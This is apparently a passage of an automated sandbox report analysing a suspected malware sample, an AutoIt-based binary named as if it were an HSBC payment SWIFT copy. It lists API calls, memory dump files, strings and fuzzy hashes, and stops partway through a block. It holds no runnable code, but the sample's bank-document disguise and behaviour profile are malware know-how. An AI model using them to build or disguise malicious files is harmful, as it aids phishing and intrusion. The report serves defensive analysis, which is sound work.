                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3840717409-0
                                                                                                                                • Opcode ID: 7c1e29eb0d6546526f7bf02749a02c08615e0055e01556d9d4458958f3186005
                                                                                                                                • Instruction ID: 465013ed7bae675e5e74a5040b112dab941d29cc845c875624b20bd9940be291
                                                                                                                                • Opcode Fuzzy Hash: 7c1e29eb0d6546526f7bf02749a02c08615e0055e01556d9d4458958f3186005
                                                                                                                                • Instruction Fuzzy Hash: 8F412775600208EFDB219FA5DC88EAABBB8FBCA711F108168F905D7261D7389D01CB64
                                                                                                                                APIs
                                                                                                                                • __wsplitpath.LIBCMT ref: 0078DA10
                                                                                                                                • _wcscat.LIBCMT ref: 0078DA28
                                                                                                                                • _wcscat.LIBCMT ref: 0078DA3A
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078DA4F
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0078DA63
                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0078DA7B
                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 0078DA95
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0078DAA7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                • String ID: *.*
                                                                                                                                • API String ID: 34673085-438819550
                                                                                                                                • Opcode ID: 7e31e10e0e28ec110c258593d961ae541e49b8acf935b82153b4563e574997e4
                                                                                                                                • Instruction ID: 9daf3756c528316e3d7c384060b286c621b78e744bf66f6f6ddce9beb9575431
                                                                                                                                • Opcode Fuzzy Hash: 7e31e10e0e28ec110c258593d961ae541e49b8acf935b82153b4563e574997e4
                                                                                                                                • Instruction Fuzzy Hash: D08162715442419FCB34EF65C844AAAB7E9FF89310F18882EF889C7291E638ED45CB52
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623
                                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007AC1FC
                                                                                                                                • GetFocus.USER32 ref: 007AC20C
                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 007AC217
                                                                                                                                • _memset.LIBCMT ref: 007AC342
                                                                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007AC36D
                                                                                                                                • GetMenuItemCount.USER32(?), ref: 007AC38D
                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 007AC3A0
                                                                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007AC3D4
                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007AC41C
                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007AC454
                                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007AC489
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 1296962147-4108050209
                                                                                                                                • Opcode ID: dad0e0803e0ec283b6f11b2755bcb2645cf6e9499fc1e93f88ddc245ba591e07
                                                                                                                                • Instruction ID: be811b56e01ac00ac9336dcc4bd1de58ad1980d2cef483aeb34da96a32ee7e74
                                                                                                                                • Opcode Fuzzy Hash: dad0e0803e0ec283b6f11b2755bcb2645cf6e9499fc1e93f88ddc245ba591e07
                                                                                                                                • Instruction Fuzzy Hash: 0281A070608341EFDB11CF64C894A6BBBE8FBCA314F004A2EF99597291C738D905CB96
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(00000000), ref: 0079738F
                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0079739B
                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 007973A7
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 007973B4
                                                                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00797408
                                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00797444
                                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00797468
                                                                                                                                • SelectObject.GDI32(00000006,?), ref: 00797470
                                                                                                                                • DeleteObject.GDI32(?), ref: 00797479
                                                                                                                                • DeleteDC.GDI32(00000006), ref: 00797480
                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0079748B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                • String ID: (
                                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                                • Opcode ID: adc36d5c91b6931ef1235e0e52502661794550ebaf4e65c6da37af4fd9850b5f
                                                                                                                                • Instruction ID: 36e56f9208b27b2ad99aeb6a806b463af0ef9e95d2d253409d4b6e15571d05db
                                                                                                                                • Opcode Fuzzy Hash: adc36d5c91b6931ef1235e0e52502661794550ebaf4e65c6da37af4fd9850b5f
                                                                                                                                • Instruction Fuzzy Hash: 97514875904249EFCB14CFA8DC85EAFBBB9EF89310F14842DF99997211C735A940CB54
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00740957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00726B0C,?,00008000), ref: 00740973
                                                                                                                                  • Part of subcall function 00724750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00724743,?,?,007237AE,?), ref: 00724770
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00726BAD
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00726CFA
                                                                                                                                  • Part of subcall function 0072586D: _wcscpy.LIBCMT ref: 007258A5
                                                                                                                                  • Part of subcall function 0074363D: _iswctype.LIBCMT ref: 00743645
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                • API String ID: 537147316-1018226102
                                                                                                                                • Opcode ID: 03ecc8f2a44467b11df2b7a0f302a110faf3f69b4686e7ed40918fb4c1a23d8b
                                                                                                                                • Instruction ID: 37759e4a9139c6e32655dd26e8cc09c7c5553b115d435b00a8c1d6cfd6affb1a
                                                                                                                                • Opcode Fuzzy Hash: 03ecc8f2a44467b11df2b7a0f302a110faf3f69b4686e7ed40918fb4c1a23d8b
                                                                                                                                • Instruction Fuzzy Hash: 5202BE70108350DFCB18EF24D8859AFBBE5EF99354F10481EF489972A1DB78DA49CB52
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00782D50
                                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00782DDD
                                                                                                                                • GetMenuItemCount.USER32(007E5890), ref: 00782E66
                                                                                                                                • DeleteMenu.USER32(007E5890,00000005,00000000,000000F5,?,?), ref: 00782EF6
                                                                                                                                • DeleteMenu.USER32(007E5890,00000004,00000000), ref: 00782EFE
                                                                                                                                • DeleteMenu.USER32(007E5890,00000006,00000000), ref: 00782F06
                                                                                                                                • DeleteMenu.USER32(007E5890,00000003,00000000), ref: 00782F0E
                                                                                                                                • GetMenuItemCount.USER32(007E5890), ref: 00782F16
                                                                                                                                • SetMenuItemInfoW.USER32(007E5890,00000004,00000000,00000030), ref: 00782F4C
                                                                                                                                • GetCursorPos.USER32(?), ref: 00782F56
                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00782F5F
                                                                                                                                • TrackPopupMenuEx.USER32(007E5890,00000000,?,00000000,00000000,00000000), ref: 00782F72
                                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00782F7E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3993528054-0
                                                                                                                                • Opcode ID: 8de26374f67fcbb644d3b232cee4be8eab03d8bcc0d70dcc7821b7576a38bdd2
                                                                                                                                • Instruction ID: 3ce425b9daeea2d3090d7809d3f4911d1409c5b6fe820ede69e8d4580f1785d5
                                                                                                                                • Opcode Fuzzy Hash: 8de26374f67fcbb644d3b232cee4be8eab03d8bcc0d70dcc7821b7576a38bdd2
                                                                                                                                • Instruction Fuzzy Hash: 6D714C70780205BFEB21AF54DC89FAABF64FF05315F104216F615AA1E2C7B95C21C754
                                                                                                                                APIs
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 007988D7
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00798904
                                                                                                                                • CoUninitialize.OLE32 ref: 0079890E
                                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00798A0E
                                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00798B3B
                                                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,007B2C0C), ref: 00798B6F
                                                                                                                                • CoGetObject.OLE32(?,00000000,007B2C0C,?), ref: 00798B92
                                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00798BA5
                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00798C25
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00798C35
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                • String ID: ,,{
                                                                                                                                • API String ID: 2395222682-821077388
                                                                                                                                • Opcode ID: ea298fb912ff99d564f6e7c0c7edb7d2d7ac391288668a31145b6c335d5f55e3
                                                                                                                                • Instruction ID: 31c1f23d8f2d7d3eb8acc21e59240ff74c8fe9d77b610ae1a937d81227c7ae63
                                                                                                                                • Opcode Fuzzy Hash: ea298fb912ff99d564f6e7c0c7edb7d2d7ac391288668a31145b6c335d5f55e3
                                                                                                                                • Instruction Fuzzy Hash: 42C135B1208305AFCB40DF64D88492BB7E9FF8A348F04495DF98A9B251DB79ED05CB52
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                • _memset.LIBCMT ref: 0077786B
                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007778A0
                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007778BC
                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007778D8
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00777902
                                                                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0077792A
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00777935
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0077793A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                • API String ID: 1411258926-22481851
                                                                                                                                • Opcode ID: 2fa8f7361829994dfcf182d5188e6ec496ece1d6d56d3e1919d3ad188723c302
                                                                                                                                • Instruction ID: f94a2f4523dc70a177e41e2a1f753981d04a73d3e4341b469cab579abc5df801
                                                                                                                                • Opcode Fuzzy Hash: 2fa8f7361829994dfcf182d5188e6ec496ece1d6d56d3e1919d3ad188723c302
                                                                                                                                • Instruction Fuzzy Hash: DE41E972C14629EACF19EFA4EC49DEEB778FF04350F408469E905A3161EA385D45CB90
                                                                                                                                APIs
                                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079FDAD,?,?), ref: 007A0E31
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                • API String ID: 3964851224-909552448
                                                                                                                                • Opcode ID: eaa015e6107bd3b03ba7b8c8eedc193d0f4263eab3ef83ac85fd9d535fee38cc
                                                                                                                                • Instruction ID: f4b45369f04b57d4fcd3270f9769855f35783ea942977c23b88b42d22a0613de
                                                                                                                                • Opcode Fuzzy Hash: eaa015e6107bd3b03ba7b8c8eedc193d0f4263eab3ef83ac85fd9d535fee38cc
                                                                                                                                • Instruction Fuzzy Hash: BC414C3124028ACFCF10EF10D869AEF3760AF52340F144965FD552B292DB3CA91ACBE0
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0075E2A0,00000010,?,Bad directive syntax error,007AF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0077F7C2
                                                                                                                                • LoadStringW.USER32(00000000,?,0075E2A0,00000010), ref: 0077F7C9
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                • _wprintf.LIBCMT ref: 0077F7FC
                                                                                                                                • __swprintf.LIBCMT ref: 0077F81E
                                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0077F88D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                • API String ID: 1506413516-4153970271
                                                                                                                                • Opcode ID: 7d35c976d028baac3b509a90d67e8355e538a466c41cafc1ff5dee712f0b9d73
                                                                                                                                • Instruction ID: 60a77c969bc0a8290b5b87f15423a7e36db2b8c70f62171bc7dce03e87ac5381
                                                                                                                                • Opcode Fuzzy Hash: 7d35c976d028baac3b509a90d67e8355e538a466c41cafc1ff5dee712f0b9d73
                                                                                                                                • Instruction Fuzzy Hash: DF21913294021EEBCF15EF90DD0AEEE7738BF14300F044866F509661A1EA79A658CB51
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                  • Part of subcall function 00727924: _memmove.LIBCMT ref: 007279AD
                                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00785330
                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00785346
                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00785357
                                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00785369
                                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0078537A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: SendString$_memmove
                                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                • API String ID: 2279737902-1007645807
                                                                                                                                • Opcode ID: b5b275ebe38b0212829b58f983023fe7c67b323546ccfab0c76227b595f8f184
                                                                                                                                • Instruction ID: f4bd5729be577af06b689cf22e342365bed3858d258ddd0d08e776c6ff600ff1
                                                                                                                                • Opcode Fuzzy Hash: b5b275ebe38b0212829b58f983023fe7c67b323546ccfab0c76227b595f8f184
                                                                                                                                • Instruction Fuzzy Hash: 2A11E770A90229BAD764BBB1DC4EDFF7B7CEBD2B54F00042AB401A21D1DEA85D44C6B1
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                • String ID: 0.0.0.0
                                                                                                                                • API String ID: 208665112-3771769585
                                                                                                                                • Opcode ID: 3037400b4441e6b4181818bde9852f4af052d02aa44a75599ca74c675168af69
                                                                                                                                • Instruction ID: 38e57b6f4f3896ff21450213e9938f9854f8cd4a976aa06cd1d274e084705319
                                                                                                                                • Opcode Fuzzy Hash: 3037400b4441e6b4181818bde9852f4af052d02aa44a75599ca74c675168af69
                                                                                                                                • Instruction Fuzzy Hash: 7411E731940115AFCB20BB709C4AEEA7BBCEF42711F4441BAF54596092EFBC99818B54
                                                                                                                                APIs
                                                                                                                                • timeGetTime.WINMM ref: 00784F7A
                                                                                                                                  • Part of subcall function 0074049F: timeGetTime.WINMM(?,7694B400,00730E7B), ref: 007404A3
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00784FA6
                                                                                                                                • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00784FCA
                                                                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00784FEC
                                                                                                                                • SetActiveWindow.USER32 ref: 0078500B
                                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00785019
                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00785038
                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00785043
                                                                                                                                • IsWindow.USER32 ref: 0078504F
                                                                                                                                • EndDialog.USER32(00000000), ref: 00785060
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
